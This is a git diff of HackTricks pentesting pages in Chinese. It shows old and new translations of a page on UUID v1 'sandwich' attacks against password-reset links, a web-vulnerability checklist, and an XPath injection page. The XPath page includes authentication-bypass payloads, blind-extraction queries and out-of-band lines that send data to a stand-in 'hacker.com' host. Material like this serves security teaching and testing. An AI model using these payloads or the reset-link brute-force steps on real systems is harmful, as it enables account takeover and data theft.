* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 基本信息
通用唯一标识符UUID是**用于在计算机系统中唯一标识信息的128位数字**。在需要无需中央协调的唯一标识符的应用程序中UUID是必不可少的。它们通常用作数据库键并且可以指代各种元素,如文档和会话。
通用唯一标识符 (UUID) 是 **用于唯一标识计算机系统中信息的 128 位数字**。UUID 在需要唯一标识符而无需中央协调的应用程序中至关重要。它们通常用作数据库键,并可以引用各种元素,如文档和会话。
UUID设计为**唯一且难以猜测**。它们以特定格式结构化分为五组表示为32个十六进制数字。有不同版本的UUID每个版本用于不同的目的:
UUID 旨在是唯一的,并且 **难以猜测**。它们以特定格式构造,分为五组,表示为 32 个十六进制数字。UUID 有不同的版本,每个版本服务于不同的目的:
* **UUID v1**基于时间包含时间戳、时钟序列和节点IDMAC地址但可能会暴露系统信息。
* **UUID v2**类似于v1但包括用于本地域的修改(不常用)。
* **UUID v3和v5**使用来自命名空间和名称的哈希值生成UUIDv3使用MD5v5使用SHA-1。
* **UUID v4**几乎完全随机生成,提供高度匿名性,但存在轻微重复风险。
* **UUID v1**基于时间,包含时间戳、时钟序列和节点 IDMAC 地址),但可能会暴露系统信息。
* **UUID v2** 类似于 v1但包含针对本地域的修改(不常用)。
* **UUID v3 v5** 使用命名空间和名称的哈希值生成 UUIDv3 使用 MD5v5 使用 SHA-1。
* **UUID v4** 几乎完全随机生成,提供较高的匿名性,但存在轻微的重复风险。
{% hint style="success" %}
请注意UUID的版本和子版本通常出现在UUID内的相同位置。例如\
请注意UUID 的版本和子版本通常出现在 UUID 内的相同位置。例如\
12345678 - abcd - 1a56 - a539 - 103755193864\
xxxxxxxx - xxxx - Mxxx - Nxxx - xxxxxxxxxxxx
* **M的位置**表示UUID的**版本**。在上面的示例中它是UUID v**1**。
* **N的位置**表示UUID的变体。
* **M 的位置** 表示 UUID **版本**。在上面的示例中,它是 UUID v**1**。
* **N 的位置** 表示 UUID 变体。
{% endhint %}
## 三明治攻击
"三明治攻击"是一种特定类型的攻击,**利用UUID v1在Web应用程序中生成的可预测性**特别是在诸如密码重置之类的功能中。UUID v1基于时间、时钟序列和节点的MAC地址生成如果攻击者可以获取一些接近时间生成的UUID则可能会使其有些可预测性
“三明治攻击”是一种特定类型的攻击,**利用 UUID v1 在 Web 应用程序中生成的可预测性**特别是在密码重置等功能中。UUID v1 是基于时间、时钟序列和节点的 MAC 地址生成的,如果攻击者能够获取一些在时间上接近生成的 UUID这可能使其在某种程度上可预测
### 示例
想象一个Web应用程序使用UUID v1生成密码重置链接。以下是攻击者可能利用此漏洞获取未经授权访问的方式:
想象一个使用 UUID v1 生成密码重置链接的 Web 应用程序。以下是攻击者可能如何利用这一点来获得未授权访问的方式:
1. **初始设置**
* 攻击者控制两个电子邮件账户:\`attacker1@acme.com\`和\`attacker2@acme.com\`。
* 目标的电子邮件账户是\`victim@acme.com\`。
* 攻击者控制两个电子邮件帐户:\`attacker1@acme.com\` 和 \`attacker2@acme.com\`。
* 目标的电子邮件帐户是 \`victim@acme.com\`。
2. **执行**
* 攻击者触发其第一个户(\`attacker1@acme.com\`的密码重置并收到一个带有UUID的密码重置链接例如\`99874128-7592-11e9-8201-bb2f15014a14\`。
* 紧接着,攻击者触发受害者账户(\`victim@acme.com\`)的密码重置,然后迅速触发第二个攻击者控制的账户(\`attacker2@acme.com\`)的密码重置。
* 攻击者收到第二个账户的重置链接带有UUID例如\`998796b4-7592-11e9-8201-bb2f15014a14\`。
* 攻击者触发其第一个户(\`attacker1@acme.com\`)的密码重置,并收到一个带有 UUID 的密码重置链接,例如 \`99874128-7592-11e9-8201-bb2f15014a14\`。
* 紧接着,攻击者触发受害者帐户(\`victim@acme.com\`)的密码重置,然后迅速为第二个攻击者控制的帐户(\`attacker2@acme.com\`)触发密码重置。
* 攻击者收到第二个帐户的重置链接UUID 为 \`998796b4-7592-11e9-8201-bb2f15014a14\`。
3. **分析**
* 攻击者现在有两个接近时间生成的UUID\`99874128\`和\`998796b4\`。鉴于基于时间的UUID的顺序性受害者账户的UUID可能位于这两个值之间。
* 攻击者现在有两个在时间上接近生成的 UUID\`99874128\` 和 \`998796b4\`)。考虑到基于时间的 UUID 的顺序特性,受害者帐户的 UUID 很可能在这两个值之间。
4. **暴力破解攻击**
4. **暴力攻击**
* 攻击者使用工具生成这两个值之间的UUID并通过尝试访问密码重置链接例如\`https://www.acme.com/reset/\<generated-UUID>\`来测试每个生成的UUID。
* 如果Web应用程序没有充分限制速率或阻止此类尝试攻击者可以快速测试范围内的所有可能UUID。
* 攻击者使用工具生成这两个值之间的 UUID并通过尝试访问密码重置链接例如 \`https://www.acme.com/reset/\<generated-UUID>\`)来测试每个生成的 UUID。
* 如果 Web 应用程序没有充分限制速率或阻止此类尝试,攻击者可以快速测试范围内的所有可能 UUID。
5. **获访问权限**
5. **获访问权限**
* 一旦发现受害者密码重置链接的正确UUID攻击者可以重置受害者的密码并未经授权访问其账户
* 一旦发现受害者密码重置链接的正确 UUID攻击者可以重置受害者的密码并获得未授权访问其帐户的权限
### 工具
* 您可以使用工具[**https://github.com/Lupin-Holmes/sandwich**](https://github.com/Lupin-Holmes/sandwich)自动执行三明治攻击。
* 您可以使用Burp Suite的扩展[**UUID Detector**](https://portswigger.net/bappstore/65f32f209a72480ea5f1a0dac4f38248)检测这种类型的UUID。
* 您可以使用工具自动执行三明治攻击:[**https://github.com/Lupin-Holmes/sandwich**](https://github.com/Lupin-Holmes/sandwich)
* 您可以使用扩展 [**UUID 检测器**](https://portswigger.net/bappstore/65f32f209a72480ea5f1a0dac4f38248) 在 Burp Suite 中检测这些类型的 UUID。
## 参考资料
## 参考文献
* [https://versprite.com/blog/universally-unique-identifiers/](https://versprite.com/blog/universally-unique-identifiers/)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,64 +1,65 @@
# Web漏洞方法论
# Web Vulnerabilities Methodology
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
在每次Web渗透测试中都存在**一些隐藏和明显的可能存在漏洞的地方**。本文旨在作为一个检查清单,确认您已经在所有可能的地方搜索漏洞。
在每次 Web 渗透测试中,有 **几个隐藏和明显的地方可能存在漏洞**。这篇文章旨在作为一个检查清单,以确认您已在所有可能的地方搜索漏洞。
## 代理
{% hint style="info" %}
如今**Web应用程序**通常会**使用某种形式的中间代理**,这些代理可能会被(滥)用来利用漏洞。这些漏洞需要存在一个有漏洞的代理,但通常还需要后端存在一些额外的漏洞。
如今 **web** **应用程序** 通常 **使用** 某种 **中介** **代理**,这些代理可能被(滥)用来利用漏洞。这些漏洞需要一个脆弱的代理存在,但它们通常还需要后端的某些额外漏洞。
{% endhint %}
* [ ] [**滥用逐跳头**](abusing-hop-by-hop-headers.md)
* [ ] [**缓存毒/缓存欺骗**](cache-deception/)
* [ ] [**HTTP请求走私**](http-request-smuggling/)
* [ ] [**H2C走私**](h2c-smuggling.md)
* [ ] [**滥用 hop-by-hop 头**](abusing-hop-by-hop-headers.md)
* [ ] [**缓存毒/缓存欺骗**](cache-deception/)
* [ ] [**HTTP 请求走私**](http-request-smuggling/)
* [ ] [**H2C 走私**](h2c-smuggling.md)
* [ ] [**服务器端包含/边缘端包含**](server-side-inclusion-edge-side-inclusion-injection.md)
* [ ] [**揭Cloudflare**](../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
* [ ] [**XSLT服务器端注入**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
* [ ] [**代理/WAF绕过保护**](proxy-waf-protections-bypass.md)
* [ ] [**揭Cloudflare**](../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
* [ ] [**XSLT 服务器端注入**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
* [ ] [**代理 / WAF 保护绕过**](proxy-waf-protections-bypass.md)
## **用户输入**
{% hint style="info" %}
大多数Web应用程序将允许用户输入一些稍后将被处理的数据。\
根据服务器期望的数据结构,某些漏洞可能适用,而另一些可能不适用。
大多数 web 应用程序将 **允许用户输入一些数据以便后续处理。**\
根据服务器期望的数据结构,某些漏洞可能适用不适用。
{% endhint %}
### **反射值**
如果输入的数据在响应中以某种方式反映出来,页面可能容易受到多种问题的影响。
如果输入的数据可能以某种方式反射在响应中,则页面可能会受到多种问题的影响。
* [ ] [**客户端模板注入**](client-side-template-injection-csti.md)
* [ ] [**命令注入**](command-injection.md)
* [ ] [**CRLF**](crlf-0d-0a.md)
* [ ] [**悬标记**](dangling-markup-html-scriptless-injection/)
* [ ] [**悬标记**](dangling-markup-html-scriptless-injection/)
* [ ] [**文件包含/路径遍历**](file-inclusion/)
* [ ] [**开放重定向**](open-redirect.md)
* [ ] [**原型污染到XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
* [ ] [**原型污染到 XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
* [ ] [**服务器端包含/边缘端包含**](server-side-inclusion-edge-side-inclusion-injection.md)
* [ ] [**服务器端请求伪造**](ssrf-server-side-request-forgery/)
* [ ] [**服务器端模板注入**](ssti-server-side-template-injection/)
* [ ] [**反向标签窃取**](reverse-tab-nabbing.md)
* [ ] [**XSLT服务器端注入**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
* [ ] [**反向标签劫持**](reverse-tab-nabbing.md)
* [ ] [**XSLT 服务器端注入**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
* [ ] [**XSS**](xss-cross-site-scripting/)
* [ ] [**XSSI**](xssi-cross-site-script-inclusion.md)
* [ ] [**XS-Search**](xs-search/)
* [ ] [**XS-搜索**](xs-search/)
其中一些漏洞需要特殊条件,其他只需要内容被反映。您可以在以下链接中找到一些有趣的多语言代码,以快速测试漏洞:
一些提到的漏洞需要特殊条件,其他的只需要内容被反射。您可以找到一些有趣的多语言工具来快速测试漏洞:
{% content-ref url="pocs-and-polygloths-cheatsheet/" %}
[pocs-and-polygloths-cheatsheet](pocs-and-polygloths-cheatsheet/)
@ -66,37 +67,37 @@
### **搜索功能**
如果功能可用于在后端搜索某种数据,也许您可以(滥)用它来搜索任意数据。
如果功能可用于在后端搜索某种数据,您可能可以(滥)用它来搜索任意数据。
* [ ] [**文件包含/路径遍历**](file-inclusion/)
* [ ] [**NoSQL注入**](nosql-injection.md)
* [ ] [**LDAP注入**](ldap-injection.md)
* [ ] [**NoSQL 注入**](nosql-injection.md)
* [ ] [**LDAP 注入**](ldap-injection.md)
* [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md)
* [ ] [**SQL注入**](sql-injection/)
* [ ] [**XPATH注入**](xpath-injection.md)
* [ ] [**SQL 注入**](sql-injection/)
* [ ] [**XPATH 注入**](xpath-injection.md)
### **表单、WebSockets和PostMsgs**
### **表单、WebSockets PostMsgs**
当WebSocket发布消息或表单允许用户执行操作时可能会出现漏洞。
WebSocket 发布消息或表单允许用户执行操作时,可能会出现漏洞。
* [ ] [**跨站请求伪造**](csrf-cross-site-request-forgery.md)
* [ ] [**跨站WebSocket劫持CSWSH**](websocket-attacks.md)
* [ ] [**PostMessage漏洞**](postmessage-vulnerabilities/)
* [ ] [**跨站 WebSocket 劫持 (CSWSH)**](websocket-attacks.md)
* [ ] [**PostMessage 漏洞**](postmessage-vulnerabilities/)
### **HTTP头**
### **HTTP 头**
根据Web服务器提供的HTTP头可能存在一些漏洞。
根据 web 服务器提供的 HTTP 头,可能存在某些漏洞。
* [ ] [**点击劫持**](clickjacking.md)
* [ ] [**内容安全策略绕过**](content-security-policy-csp-bypass/)
* [ ] [**Cookie黑客**](hacking-with-cookies/)
* [ ] [**CORS - 配置错误和绕过**](cors-bypass.md)
* [ ] [**Cookies 黑客**](hacking-with-cookies/)
* [ ] [**CORS - 错误配置与绕过**](cors-bypass.md)
### **绕过**
一些特定功能,可能需要一些变通方法才能绕过它们。
几个特定功能可能需要一些变通方法来绕过它们。
* [ ] [**2FA/OTP绕过**](2fa-bypass.md)
* [ ] [**2FA/OTP 绕过**](2fa-bypass.md)
* [ ] [**绕过支付流程**](bypass-payment-process.md)
* [ ] [**验证码绕过**](captcha-bypass.md)
* [ ] [**登录绕过**](login-bypass/)
@ -105,50 +106,52 @@
* [ ] [**重置忘记密码绕过**](reset-password.md)
* [ ] [**注册漏洞**](registration-vulnerabilities.md)
### **结构化对象/特定功能**
### **结构化对象 / 特定功能**
某些功能将需要**数据以非常特定的格式结构化**如语言序列化对象或XML。因此更容易确定应用程序是否可能存在漏洞,因为它需要处理这种类型的数据。\
如果使用**特定格式的输入**(如电子邮件头注入),某些**特定功能**也可能存在漏洞
某些功能将要求 **数据以非常特定的格式进行结构化**(如语言序列化对象或 XML。因此更容易识别应用程序是否可能存在漏洞,因为它需要处理这种类型的数据。\
某些 **特定功能** 也可能存在漏洞,如果使用 **特定格式的输入**(如电子邮件头注入)。
* [ ] [**反序列化**](deserialization/)
* [ ] [**电子邮件头注入**](email-injections.md)
* [ ] [**JWT漏洞**](hacking-jwt-json-web-tokens.md)
* [ ] [**XML外部实体**](xxe-xee-xml-external-entity.md)
* [ ] [**JWT 漏洞**](hacking-jwt-json-web-tokens.md)
* [ ] [**XML 外部实体**](xxe-xee-xml-external-entity.md)
### 文件
允许上传文件的功能可能存在多个问题。\
生成包含用户输入的文件的功能可能执行意外代码。\
打开用户上传或自动生成的包含用户输入的文件的用户可能会受到威胁。
允许上传文件的功能可能会存在多种问题。\
生成包含用户输入的文件的功能可能执行意外代码。\
打开用户上传的文件或自动生成的包含用户输入的文件的用户可能会受到威胁。
* [ ] [**文件上传**](file-upload/)
* [ ] [**公式注入**](formula-csv-doc-latex-ghostscript-injection.md)
* [ ] [**PDF注入**](xss-cross-site-scripting/pdf-injection.md)
* [ ] [**服务器端XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
* [ ] [**PDF 注入**](xss-cross-site-scripting/pdf-injection.md)
* [ ] [**服务器端 XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
### **外部身份管理**
* [ ] [**OAUTH接管账户**](oauth-to-account-takeover.md)
* [ ] [**SAML攻击**](saml-attacks/)
* [ ] [**OAUTH 账户接管**](oauth-to-account-takeover.md)
* [ ] [**SAML 攻击**](saml-attacks/)
### **其他有用的漏洞**
这些漏洞可能有助于利用其他漏洞。
* [ ] [**域/子域接管**](domain-subdomain-takeover.md)
* [ ] [**域/子域接管**](domain-subdomain-takeover.md)
* [ ] [**IDOR**](idor.md)
* [ ] [**参数污染**](parameter-pollution.md)
* [ ] [**Unicode规范化漏洞**](unicode-injection/)
* [ ] [**Unicode 规范化漏洞**](unicode-injection/)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,86 +1,87 @@
# XPATH注入
# XPATH 注入
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新启动的赏金计划和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
## 基本语法
一种称为XPath注入的攻击技术用于利用根据用户输入形成XPathXML路径语言查询的应用程序来查询或导航XML文档。
一种称为 XPath 注入 的攻击技术被用来利用基于用户输入形成 XPathXML 路径语言)查询的应用程序,以查询或导航 XML 文档。
### 描述的节点
### 节点描述
表达式用于选择XML文档中的各种节点。以下是这些表达式及其描述的总结
表达式用于选择 XML 文档中的各种节点。以下是这些表达式及其描述的总结:
* **nodename**:选择所有名称为“nodename”的节点。
* **nodename**:选择所有名为 "nodename" 的节点。
* **/**:从根节点进行选择。
* **//**:选择与当前节点匹配的节点,无论其在文档中的位置如何
* **//**:选择与当前节点匹配的节点,无论它们在文档中的位置
* **.**:选择当前节点。
* **..**:选择当前节点的父节点。
* **@**:选择属性。
### XPath示例
### XPath 示例
路径表达式及其结果的示例包括:
* **bookstore**:选择所有名称为“bookstore”的节点。
* **/bookstore**选择根元素bookstore。注意,表示元素的绝对路径以斜杠(/)开头
* **bookstore/book**:选择所有作为bookstore子元素的book元素
* **//book**:选择文档中的所有book元素无论其位置如何
* **bookstore//book**:选择作为bookstore元素后代的所有book元素无论其在bookstore元素下的位置如何
* **//@lang**选择所有名为lang的属性。
* **bookstore**:选择所有名为 "bookstore" 的节点。
* **/bookstore**:选择根元素 bookstore。注意以斜杠(/)开头的路径表示元素的绝对路径。
* **bookstore/book**:选择所有 bookstore 的子元素 book
* **//book**:选择文档中的所有 book 元素,无论它们的位置
* **bookstore//book**:选择所有 bookstore 元素的后代 book 元素,无论它们在 bookstore 元素下的位置
* **//@lang**:选择所有名为 lang 的属性。
### 谓词的使用
### 使用谓词
谓词用于细化选择:
* **/bookstore/book\[1]**:选择bookstore元素的第一个book元素子节点。对于将第一个节点索引为\[0\]的IE版本5到9可以通过JavaScript将SelectionLanguage设置为XPath来解决
* **/bookstore/book\[last()]**选择bookstore元素的最后一个book元素子节点
* **/bookstore/book\[last()-1]**选择bookstore元素的倒数第二个book元素子节点
* **/bookstore/book\[position()<3]**选择bookstore元素的前两个book元素子节点
* **//title\[@lang]**:选择具有lang属性的所有title元素。
* **//title\[@lang='en']**:选择具有值为“en”的“lang”属性的所有title元素。
* **/bookstore/book\[price>35.00]**:选择价格大于35.00的所有book元素。
* **/bookstore/book\[price>35.00]/title**:选择价格大于35.00的book元素的bookstore中的所有title元素。
* **/bookstore/book\[1]**:选择 bookstore 元素的第一个子元素 book。对于 IE 5 到 9 版本,索引第一个节点为 \[0] 的解决方法是通过 JavaScript 将 SelectionLanguage 设置为 XPath
* **/bookstore/book\[last()]**:选择 bookstore 元素的最后一个子元素 book。
* **/bookstore/book\[last()-1]**:选择 bookstore 元素的倒数第二个子元素 book。
* **/bookstore/book\[position()<3]**选择 bookstore 元素的前两个子元素 book
* **//title\[@lang]**:选择所有具有 lang 属性的 title 元素。
* **//title\[@lang='en']**:选择所有 lang 属性值为 "en" 的 title 元素。
* **/bookstore/book\[price>35.00]**:选择所有价格大于 35.00 的 bookstore 元素的 book 元素。
* **/bookstore/book\[price>35.00]/title**:选择所有价格大于 35.00 的 bookstore 元素的 book 元素的 title 元素。
### 未知节点的处理
### 处理未知节点
通配符用于匹配未知节点:
* **\***:匹配任何元素节点。
* **@**\*:匹配任何属性节点。
* **node()**:匹配任何类型的任何节点。
* **node()**:匹配任何类型的节点。
进一步的示例包括:
* **/bookstore/\***选择bookstore元素的所有子元素节点。
* **/bookstore/\***:选择 bookstore 元素的所有子元素节点。
* **//\***:选择文档中的所有元素。
* **//title\[@\*\]**选择具有至少一个任意属性的所有title元素。
* **//title\[@\*]**:选择所有至少具有一个任意类型属性的 title 元素。
## 示例
```xml
@ -130,7 +131,7 @@ count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
```
### 识别窃取模式
### 识别窃取模式
```python
and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
@ -165,14 +166,14 @@ and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
```
## 身份验证绕过
## 证绕过
### **查询示例:**
### **查询示例**
```
string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
```
### **在用户和密码中绕过OR两者取相同值**
### **在用户和密码中的OR绕过两者值相同**
```
' or '1'='1
" or "1"="1
@ -187,9 +188,9 @@ Select the account using the username and use one of the previous values in the
```
Username: ' or 1]%00
```
### **用户名或密码中的双重OR运算符**(仅在一个易受攻击的字段中有效)
### **在用户名或密码中使用双重OR**(仅在一个脆弱字段有效)
重要提示:请注意**“and”是首先执行的操作**。
重要提示:注意**“and”是第一个执行的操作**。
```
Bypass with first match
(This requests are also valid without spaces)
@ -268,7 +269,7 @@ break
```python
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
```
## OOB利用
## OOB 利用
```python
doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
@ -279,15 +280,15 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
#the doc available will respond true or false depending if the doc exists,
#user not(doc-available(...)) to invert the result if you need to
```
### 自动工具
### 自动工具
* [xcat](https://xcat.readthedocs.io/)
* [xxxpwn](https://github.com/feakk/xxxpwn)
* [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart)
* [xxxpwn\_smart](https://github.com/aayla-secura/xxxpwn\_smart)
* [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
* [XmlChor](https://github.com/Harshal35/XMLCHOR)
## 参考资料
## 参考文献
